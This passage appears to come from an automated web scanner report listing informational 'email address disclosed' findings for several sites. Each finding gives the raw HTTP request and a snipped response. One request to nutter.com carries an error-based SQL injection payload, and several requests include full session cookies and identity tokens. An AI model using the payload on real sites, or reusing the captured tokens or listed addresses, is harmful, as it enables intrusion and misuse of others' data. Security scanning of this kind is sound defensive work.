23.53. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /global/security/msrc/RenderingAssets/scripts/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /global/security/msrc/RenderingAssets/scripts/jquery.colorbox-min.js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Mar 2011 11:26:42 GMT
Accept-Ranges: bytes
ETag: "6daa2032dfdfcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 279376642700000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:42 GMT
Content-Length: 9192

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";functi
...[SNIP]...
23.54. http://www.microsoft.com/global/security/msrc/renderingassets/scripts/CommonFunctions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /global/security/msrc/renderingassets/scripts/CommonFunctions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /global/security/msrc/renderingassets/scripts/CommonFunctions.js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/security/msrc/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093006535:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: application/x-javascript
Last-Modified: Fri, 11 Mar 2011 11:26:35 GMT
Accept-Ranges: bytes
ETag: "4df4d72ddfdfcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 279227142600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:38 GMT
Content-Length: 8509

...function AddCssToHead(path) {
try {
var styleElement1 = document.createElement("link");
styleElement1.setAttribute("href", path);
styleElement1.setAttribute("type",
...[SNIP]...
<a href='mailto:mapp@microsoft.com'>mapp@microsoft.com</a>
...[SNIP]...
<a href='mailto:mapp@microsoft.com'>mapp@microsoft.com</a>
...[SNIP]...
<a href='mailto:mapp@microsoft.com'>mapp@microsoft.com</a>
...[SNIP]...
<a href='mailto:mapp@microsoft.com'>mapp@microsoft.com</a>
...[SNIP]...
23.55. http://www.microsoft.com/security/msrc/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /security/msrc/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /security/msrc/default.aspx HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark:3=technet/security/advisory|sqlserver/en/us; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092998651:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Mar 2011 01:53:07 GMT
Last-Modified: Fri, 11 Mar 2011 13:14:46 GMT
ETag: 634354172860000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791378442400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:43:06 GMT
Content-Length: 29823

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en" lang="en"
...[SNIP]...
<a href="mailto:secure@microsoft.com">secure@microsoft.com</a>
...[SNIP]...
23.56. http://www.microsoft.com/technet/code/omniture/omni_rsid_mscomtechnet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /technet/code/omniture/omni_rsid_mscomtechnet.js

Issue detail

The following email address was disclosed in the response:

Request

GET /technet/code/omniture/omni_rsid_mscomtechnet.js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/advisory/2524375.mspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; MS_SRDR=homepageOptInState=forceOut; mscomhp=stickyTabIndex%3A0%2Cpath%3A/en/us%7CstickyTabIndex%3A0%2Cpath%3A/en/us; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; WebLanguagePreference=en-us; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi^0001A@E0J02hA@E0J; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=technet|security|casestudies|en-us:2=technet/security|licensing/how-to-buy|en/us|business/bposoffer|downloads/en|web/websitespark|security/msrc:3=technet/security/advisory|sqlserver/en/us; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3f56dd2f-a3a7-46f9-9355-bcc55a4ce532&Microsoft.CreationDate=03/26/2011 01:42:52&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.NumberOfVisits=1&SessionCookie.Id=D193A9CF69CB420783FEEAA9C80CD6AE; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 01:42:52&Microsoft.VisitStartDate=03/26/2011 01:42:52&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; MS0=2a3c4c9fe97247d48c9a5163057b9a69; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301093060460:ss=1301092848759

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: application/x-javascript
Last-Modified: Fri, 19 Jun 2009 21:42:33 GMT
Accept-Ranges: bytes
ETag: "806a48da26f1c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 279471242300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:36 GMT
Content-Length: 43395

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol

var _om_gbls = {
   omniGuidPath : "",
   version:"1.0",
   s_account : "", mar
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...
23.57. http://www.my-happyfeet.com/cart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24599
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
<meta http-equiv="reply-to" content="info@myhappyfeetcolors.com">
...[SNIP]...
23.58. http://www.nutter.com/careers.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15724

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a>
...[SNIP]...
<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a>
...[SNIP]...
23.59. https://www.plimus.com/jsp/buynow.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.plimus.com
Path:   /jsp/buynow.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /jsp/buynow.jsp?contractId=1947672 HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fwww.plimus.com%2Fjsp%2Fbuynow.jsp%3FcontractId%3D1947672%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=2950920; sessionId=web41946268920227930; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:13 GMT
Server: Apache
Set-Cookie: contractId=1947672; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Set-Cookie: sessionId=web48546432239533572; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 188883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
<a href="mailto:sales@fast-report.com" class="lli">
...[SNIP]...
<a href="mailto:sales@fast-report.com" class="icons">
...[SNIP]...
23.60. http://www.smartertools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300551915.1300554519.2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:57:48 GMT
Content-Length: 24112


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_
...[SNIP]...
<div class='feed-text'>

When opening webmail (info@my-happyfeet.com) the page...</div>
...[SNIP]...
23.61. http://www.smartertools.com/smartermail/mail-server-download.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartertools.com
Path:   /smartermail/mail-server-download.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /smartermail/mail-server-download.aspx HTTP/1.1
Host: www.smartertools.com
Proxy-Connection: keep-alive
Referer: http://www.smartertools.com/smartermail/mail-server-software.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=nts3gc5tu1hyp1kyuo3cjh33; __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.2.10.1301158717

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:02 GMT
Content-Length: 22186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_
...[SNIP]...
<a href="mailto:support@smartertools.com">support@smartertools.com</a>
...[SNIP]...
23.62. http://www.soundingsonline.com/archives/'+NSFTW+'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The following email addresses were disclosed in the response:

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
